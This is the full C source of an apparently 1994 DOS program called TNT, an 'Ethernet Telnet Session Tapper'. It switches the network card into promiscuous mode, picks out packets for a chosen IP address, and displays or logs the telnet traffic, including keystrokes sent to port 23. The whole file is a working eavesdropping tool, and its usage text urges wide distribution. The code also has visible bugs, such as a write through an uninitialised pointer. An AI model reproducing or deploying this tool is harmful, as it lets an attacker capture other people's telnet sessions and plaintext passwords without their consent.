
#include <stdio.h>
#include <io.h>
#include <fcntl.h>
#include <dos.h>
#include <conio.h>
#include "c:pktdrvr.h"

#define MAXSTORE 20
#define PBUFSIZE 2000
#define M_PROMISCUOUS 6


typedef struct {
   unsigned int ip_len,tcp_source_port,actual_len,
      tcp_dest_port,tcp_data_offset,data_offset,data_length;
   unsigned char tcp_flags,ip_prot,
     ip_source_address[4],ip_dest_address[4];
	} tcp_gram;

unsigned int full,full2;
unsigned char store[MAXSTORE][PBUFSIZE];		/* incoming buffers*/
unsigned int len_store[MAXSTORE];                 /* packet lengths*/
char nstore[PBUFSIZE];                  /* temporary buffer*/
unsigned char current_store=0;		/* single buffer */
int intno,oldmode;
unsigned int packet_len;		/* the length of data in buffer */
char myeaddr[6];			/* our Ethernet address */
char pkt_err [50];			/* error string space */
int ver_min=3;
int ver_maj=0;


int axs_all_type();
char *pkerror(int number);
char printable(unsigned char);
void hex_dump(char *,unsigned int);
void summary(char*);
char hatoi(char);



void veg_receiver()
{
rec:asm{push ds
	mov bx,seg store
	mov ds,bx
	cmp ax,0
	jz first
	mov packet_len,cx}
	if ((packet_len<12)||(packet_len>PBUFSIZE)) goto out;
	len_store[current_store]=packet_len;
	if (current_store++==MAXSTORE) current_store=0;
out:asm	{
	 pop ds
	 retf}
first:
      asm{
	cmp cx,PBUFSIZE
	jg out}
	_DI=FP_OFF(&store[current_store]);
	_ES=FP_SEG(&store[current_store]);
asm{	pop ds
	retf}
}



void putps(char* buffer)
{
int i=0;
while (buffer[i]) putchar(buffer[i++]);
}



void hex_dump(char *buffer,unsigned int l)
{
unsigned int count;
char ASC [17];
ASC[0]='\0';
ASC[16]='\0';
for(count=0;count<l;count++) {
   if (!(count%0x10)) {
      putps(ASC);
      printf("\n%04X ",count);
   }
   printf("%02X ",(unsigned char)buffer[count]);
   if (!(isprint(ASC[(count%0x10)]=buffer[count]))) ASC[count%0x10]=0x2e;
}
for(;(count%0x10);count++) {
   printf("   ");
   ASC[(count%0x10)]='\0';
}
putps(ASC);
printf("\n");
}



int tcp_data_dump(unsigned char *buffer,unsigned int len,tcp_gram *dg)
{

int i,x,y;
if (len<34) return(-1);
if ((buffer[12]!=0x08)||(buffer[13]!=0)) return(-1);
if ((dg->ip_prot=buffer[23])!=06) return(-1);
dg->actual_len=(buffer[16]*256)+buffer[17]+14;
dg->ip_len=(((buffer[14]&0xf)*4)+14);
dg->tcp_source_port=(buffer[dg->ip_len]*256)+buffer[dg->ip_len+1];
dg->tcp_dest_port=(buffer[dg->ip_len+2]*256)+buffer[dg->ip_len+3];
dg->tcp_flags=(buffer[dg->ip_len+13]);
dg->tcp_data_offset=((buffer[dg->ip_len+12])/16)*4;
dg->data_offset=dg->ip_len+dg->tcp_data_offset;
dg->data_length=dg->actual_len-dg->data_offset;
//printf("\n%02X %d %d %02X %d %d",ip_len,tcp_source_port,tcp_dest_port,tcp_flags,data_offset,actual_len);
}



int driver_there(int intno)
{
return(
  !_fstrcmp((char far *)MK_FP(peek(0,((intno*4)+2)),peek(0,(intno*4))+0x3),"PKT DRVR"));
}


void summary(char *buffer)
{
int i;
printf("\nTo  :");
for(i=0;i<6;i++) printf("%02X:",(unsigned char)buffer[i]);
printf("  From:");
for(i=6;i<12;i++) printf("%02X:",(unsigned char)buffer[i]);
printf(" Type:");
for(i=12;i<14;i++) printf("%02X",(unsigned char)buffer[i]);
}


int ipmatch(char *addr,char *buffer)
{
if (memcmp(&buffer[26],addr,4)==0) return(1);
if (memcmp(&buffer[30],addr,4)==0) return(2);
return(0);
}



int amatch(char *addr,char *buffer)
{
if (memcmp(buffer,addr,6)==0) return(1);
if (memcmp(buffer[6],addr,6)==0) return(2);
return(0);
}


int ishdigit(char c)
{
if (isdigit(c)) return(1);
if ((c>='A')&&(c<='F')) return(1);
return(0);
}



char hatoi(char conv)
{
if ((conv>='0')&&(conv<='9')) {return(conv-'0');}
if (((char)toupper(conv)<='F')&&((char)toupper(conv)>='A')) {return(toupper(conv)-'A'+0xa);}
return(0);
}



void adrcpy(unsigned char *addr,unsigned char *buffer,int len)
{
int ofs,ofs2=0;
printf("Sniffing");
for (ofs=0;ofs<len;ofs++) {
   while (!ishdigit(toupper(buffer[ofs2]))) ofs2++;
   addr[ofs]=hatoi(buffer[ofs2++])*16;
   while (!ishdigit(toupper(buffer[ofs2]))) ofs2++;
   addr[ofs]+=hatoi(buffer[ofs2++]);
   printf(":%02X",addr[ofs]);
}
printf("\n");
}


void ipadrcpy(unsigned char *addr,unsigned char *buffer)
{
int ofs,ofs2=0,innum;
for (ofs=0;ofs<4;ofs++) {
   innum=1;
   while (innum) {
      if (isdigit(buffer[ofs2])) {
	 addr[ofs]*=10;
	 addr[ofs]+=(buffer[ofs2]-'0');
      } else innum--;
   ofs2++;
   }
}
printf("IP sniffing %d.%d.%d.%d\n",addr[0],addr[1],addr[2],addr[3]);
}


int packet_wanted()
{
}



void ip_summary(unsigned char *buffer)
{
printf("\nIP Prot:%02X ",buffer[23]);
printf(" To: %d.%d.%d.%d",(int)buffer[30],(int)buffer[31],(int)buffer[32],(int)buffer[33]);
printf(" From: %d.%d.%d.%d",(int)buffer[26],(int)buffer[27],(int)buffer[28],(int)buffer[29]);
}


void usage()
{
puts("\nSyntax:\n     TNT <IP address>  [-l<Logfile>]\n");
puts("TNT attempts to tap into any TELNET sessions the machine at <IP address>");
puts("is involved in. All data going INTO port 23 is put character by character");
puts("in the box at the top of the screen. Data coming from port 23 is dumped ");
puts("to the screen.");
puts("It uses the FTP software packet driver interface, so you'll need to get");
puts("one if you want any joy from this at all!");
puts("TNT is FREEWARE. Distribute like a bastard. Just don't try and make any");
puts("money out of it...\n");
}


int
main(int argc,char *argv[])
{

	int c=0,i,j,old_mode,old_store,handle,version,class,type,number,basic;
	char idle_chars[] = "-/|\\";
	char lfile[512];
	char swit;
	int x,y;
	int acc=0;
	int search=0;
	int debug=0;
	int ipsum=0;
	int log=0,lfd;
	int *cpos;
	int startint=0x60;
	int bye=0;
	int idle_index = old_store = 0;
	extern int Derr;
	char findaddr[6] = {00,00,0x8e,6,0x0c,0x19};
	char findipaddr[4] = {0,0,0,0};
	tcp_gram dg;
	*cpos=1;
	printf("\n\nTNT - Ethernet Telnet Session Tapper V%d.%d (C)Vegsoft 1994\n",ver_maj,ver_min);
/* search for the first packet driver in memory */
	for (c=1;c<argc;c++) {
		if (*argv[c]=='-') {
		   switch(argv[c][1]) {

		      case 'd':debug++;break;
		      case 'i':startint=strtol(&argv[c][2],NULL,0);
			       printf("%02X",startint);
			       if ((startint>0x80)||(startint<0x60)) startint=0x60;
			       break;
		      case 'p':ipsum++;break;
		      case 'l':strcpy(lfile,&argv[c][2]);log++;break;
		      case 's':search++;break;
		      case '?':usage();exit(1);break;
		   }
		}
		else switch(acc) {
			case(0):ipadrcpy(findipaddr,&argv[c][0]);acc++;break;
		     }
	}

	if (!acc) {usage();exit(1);}
	for (intno = startint; intno <= 0x80; intno++) {
		if (driver_there(intno))
			break;
	}
/* if there is none, crap out */
	if (!driver_there(intno)) {
		fprintf(stderr, "No packet driver found");
		exit(1);
	}
/* get a handle so that we can receive packets */
	handle=access_type(intno,CL_ETHERNET,ANYTYPE,0,NULL,0,veg_receiver,4);
	if (Derr) {fprintf(stderr,"ERR:Access_type:%s\n",pkerror(Derr));exit(1);}

/* get information about driver */
	driver_info(intno,handle,&version,&class,&type,&number,&basic);
	printf("Packet Driver Version:%d found on INT 0x%02X\n",version,intno);
	if (debug){
	   printf(" Class %d, type %d, number %d\n",class,type,number);
	   printf(" Functions: ");
	}
	if (debug)
	  if (basic!=255) {
	     if (basic&1) printf("Basic ");
	     if (basic&2) printf("Extended ");
	     if (basic&4) printf("High-performance ");
	     puts("");
	  } else puts("Not installed");

	if ((old_mode=set_mode(intno,handle,M_PROMISCUOUS))==-1)
		fprintf(stderr,"ERR:Set mode:%s\n",pkerror(Derr));
	else if (debug) printf(" Set mode %d to promiscuous mode\n",old_mode);
	if (log&&((lfd=open(lfile,O_RDWR|O_CREAT|O_APPEND))==-1)){
	   fprintf(stderr,"Couldn't open logfile %s\n",lfile);
	   perror("log");
	   log--;}

	fflush(stdin);
	while (!bye)
	   {
	      if (kbhit())  {
		 if (getch()==32) bye++;
	      }
	      if (old_store!=current_store) {
	      if (ipmatch(findipaddr,&store[old_store])) {
		 tcp_data_dump(&store[old_store],len_store[old_store],&dg);
		 if (!log) {
		  if (dg.tcp_dest_port!=23)
		     for(i=dg.data_offset;i<dg.actual_len;i++) printf("%c",store[old_store][i]);
		     else {
			x=wherex();
			y=wherey();
			gotoxy(*cpos,1);
			for(i=dg.data_offset;i<dg.actual_len;i++) {cprintf("%c",store[old_store][i]);(*cpos) ++;if (*cpos>30) *cpos=1;}
			gotoxy(x,y);
		     }
		 }
		 else {if (dg.tcp_dest_port==23) write(lfd,&store[old_store][dg.data_offset],dg.data_length);}

	      }
	   if (old_store++==MAXSTORE) old_store=0;
	   }
	}



/* tidy up */
	set_mode(intno,handle,old_mode);

/* kiss goodbye */
	if (log) close(lfd);
	release_type(intno,handle);
	return 0;
}



char *pkerror(int number)
{
switch (number) {
	case(1):   strcpy(&pkt_err,"Bad handle number");break;
	case(2):   strcpy(&pkt_err,"No interfaces of specified class found");break;
	case(3):   strcpy(&pkt_err,"No interfaces of specified type found");break;
	case(4):   strcpy(&pkt_err,"No interfaces of specified number found");break;
	case(5):   strcpy(&pkt_err,"Bad packet type specified");break;
	case(6):   strcpy(&pkt_err,"Interface doesn't multicast");break;
	case(7):   strcpy(&pkt_err,"Driver can't terminate");break;
	case(8):   strcpy(&pkt_err,"Bad receiver mode");break;
	case(9):   strcpy(&pkt_err,"Not enough room");break;
	case(10):  strcpy(&pkt_err,"Type already in use");break;
	case(11):  strcpy(&pkt_err,"Command not implemented");break;
	case(12):  strcpy(&pkt_err,"Couldn't send packet");break;
	case(13):  strcpy(&pkt_err,"Can't change hardware address");break;
	case(14):  strcpy(&pkt_err,"Hardware address has bad length or format");break;
	case(15):  strcpy(&pkt_err,"Can't reset interface (more than one handle)");break;
	default:   strcpy(&pkt_err,"Unrecognised driver error");
}
return(&pkt_err);
}



